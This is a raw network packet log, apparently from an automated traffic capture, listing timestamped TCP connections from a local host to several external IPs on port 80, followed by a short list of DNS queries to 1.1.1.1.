                                                                Dec 9, 2024 08:44:41.414635897 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.360424995 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.367988110 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.368067980 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:42.804390907 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.822851896 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.942318916 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:43.942406893 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.956914902 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:44.076332092 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.074815035 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.074841022 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.075263977 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:45.077831984 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:45.198231936 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:50.431523085 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.550920963 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:50.551630020 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.570185900 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.689513922 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:52.069945097 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:52.190831900 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:52.190886021 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.092395067 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.211745024 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:53.211889982 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.228396893 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.347676039 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:54.742227077 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:54.861957073 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:54.862241983 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.761655092 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.880873919 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:55.880965948 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.898485899 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:56.017692089 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:56.017848015 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:57.415680885 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:57.536431074 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:57.536482096 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.420459032 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.540945053 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:58.544626951 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.556433916 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.676484108 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.570445061 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.573884964 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.576564074 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:45:38.576564074 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:45:38.695868015 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:44.335011005 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.455141068 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:44.455231905 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.474548101 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.593825102 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.976449966 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:45.994277954 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.994326115 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.994338036 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:45.994379997 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:46.095733881 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:46.095783949 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.040719032 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.160209894 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:47.164731979 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.198342085 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.317675114 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.709275007 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.709379911 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.712723017 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.712778091 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.712778091 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.832829952 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.836823940 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.814985037 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.934232950 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:49.934320927 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.985852003 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:50.105201006 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:50.105237961 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466078997 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466212988 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466320992 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:51.492249966 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.548738956 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.668715954 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:52.674760103 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.758831978 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.878195047 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299120903 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299150944 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299164057 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299290895 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.299482107 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299524069 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.299664974 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299675941 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299686909 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299715996 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.300338984 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300350904 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300363064 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300379992 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.300400019 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.418662071 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.418726921 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.418857098 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.422980070 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514481068 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514619112 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514699936 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.518640995 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.518723965 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.518770933 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.527169943 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.527272940 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.527292967 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.535597086 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.535661936 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.535706997 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.544076920 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.544223070 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.551239014 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.552587032 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.552675962 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.558773994 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.560990095 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.561105013 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.566768885 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.569571972 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.569730043 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.574765921 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.577897072 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.578275919 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.579042912 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.586333990 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.586421013 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.586615086 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.633987904 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.634099960 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.634742022 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.638252974 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.638298988 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.638717890 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.729751110 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.729835987 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.730015993 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.732438087 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.734648943 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.734811068 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.739989996 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.859277010 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:46:00.327905893 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:00.447141886 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:00.447220087 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:00.463568926 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:00.583265066 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.778703928 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.778743982 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.778822899 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.779495955 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.779547930 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.779586077 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.780045033 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.780138969 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.780178070 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.780667067 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.780755043 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.780796051 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.781383991 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.781450987 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.781542063 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.898129940 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.898232937 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.898294926 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.903717995 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.903731108 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.903759956 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.910753012 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.910829067 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:01.910872936 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:01.976485014 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:02.004889965 CET8049760121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:02.004956961 CET4976080192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:02.996783018 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:03.116272926 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:03.116419077 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:03.132781029 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:03.252052069 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.485342979 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.485394001 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.485609055 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.486469030 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.486599922 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.486615896 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.486644030 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.486888885 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.486962080 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.487066984 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.487149000 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.487198114 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.487374067 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.487827063 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.487871885 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.604984999 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.605101109 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.609301090 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.609338999 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.609385967 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.616785049 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.617530107 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.648791075 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:04.731043100 CET8049761121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:04.732877016 CET4976180192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:05.668693066 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:05.787997007 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:05.788079023 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:05.807804108 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:05.927143097 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:05.927160025 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.138952971 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.138994932 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.139060974 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.139535904 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.139607906 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.139676094 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.140130043 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.140208006 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.140789986 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.140870094 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.140877962 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.140991926 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.141489029 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.141551018 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.141629934 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.258433104 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.258500099 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.259244919 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.262612104 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.262676001 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.262970924 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.271013975 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.271109104 CET8049762121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:07.271275997 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:07.320306063 CET4976280192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:08.340282917 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:08.459675074 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:08.459779978 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:08.468229055 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:08.587589979 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.815165997 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.815220118 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.815345049 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.815571070 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.815638065 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.815682888 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.816328049 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.816370964 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.816411018 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.816914082 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.817003965 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.817058086 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.817646980 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.817708015 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.817750931 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.934771061 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.934791088 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.934941053 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.938900948 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.939017057 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.939100027 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:09.948894978 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.948910952 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:09.949033976 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:10.061300993 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:10.117084980 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:19.816323042 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:19.816456079 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:19.817961931 CET4976380192.168.2.12121.43.155.35
                                                                Dec 9, 2024 08:46:19.937180042 CET8049763121.43.155.35192.168.2.12
                                                                Dec 9, 2024 08:46:25.495431900 CET4976480192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:25.614676952 CET8049764199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:25.617018938 CET4976480192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:25.634076118 CET4976480192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:25.753408909 CET8049764199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:26.853106022 CET8049764199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:26.853260040 CET8049764199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:26.853604078 CET4976480192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:27.152909040 CET4976480192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:28.168981075 CET4976580192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:28.288259029 CET8049765199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:28.288489103 CET4976580192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:28.303020954 CET4976580192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:28.422382116 CET8049765199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:29.526635885 CET8049765199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:29.526725054 CET8049765199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:29.526824951 CET4976580192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:29.805202961 CET4976580192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:30.824927092 CET4976680192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:30.944508076 CET8049766199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:30.944611073 CET4976680192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:30.962975025 CET4976680192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:31.082369089 CET8049766199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:31.082415104 CET8049766199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:32.175741911 CET8049766199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:32.175888062 CET8049766199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:32.175937891 CET4976680192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:32.461471081 CET4976680192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:33.480422974 CET4976780192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:33.599662066 CET8049767199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:33.599848032 CET4976780192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:33.610960007 CET4976780192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:33.731329918 CET8049767199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:34.828695059 CET8049767199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:34.828718901 CET8049767199.192.23.123192.168.2.12
                                                                Dec 9, 2024 08:46:34.831180096 CET4976780192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:34.834980011 CET4976780192.168.2.12199.192.23.123
                                                                Dec 9, 2024 08:46:34.955008984 CET8049767199.192.23.123192.168.2.12

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 9, 2024 08:43:17.076107025 CET5835553192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:43:17.676295996 CET53583551.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:43:34.239970922 CET5707053192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:43:34.930557966 CET53570701.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:43:49.402509928 CET5362253192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:43:49.883111000 CET53536221.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:44:04.202589035 CET5688853192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:44:05.210939884 CET5688853192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:44:05.262517929 CET53568881.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:44:05.348798037 CET53568881.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:44:19.622571945 CET5725753192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:44:20.097646952 CET53572571.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:44:35.356292009 CET5021953192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:44:35.793514013 CET53502191.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:44:50.091387987 CET5377753192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:44:50.424304962 CET53537771.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:45:43.593003035 CET5759653192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:45:44.330847979 CET53575961.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:45:59.746803999 CET5988053192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:46:00.325237989 CET53598801.1.1.1192.168.2.12
                                                                Dec 9, 2024 08:46:24.824915886 CET5239453192.168.2.121.1.1.1
                                                                Dec 9, 2024 08:46:25.489885092 CET53523941.1.1.1192.168.2.12
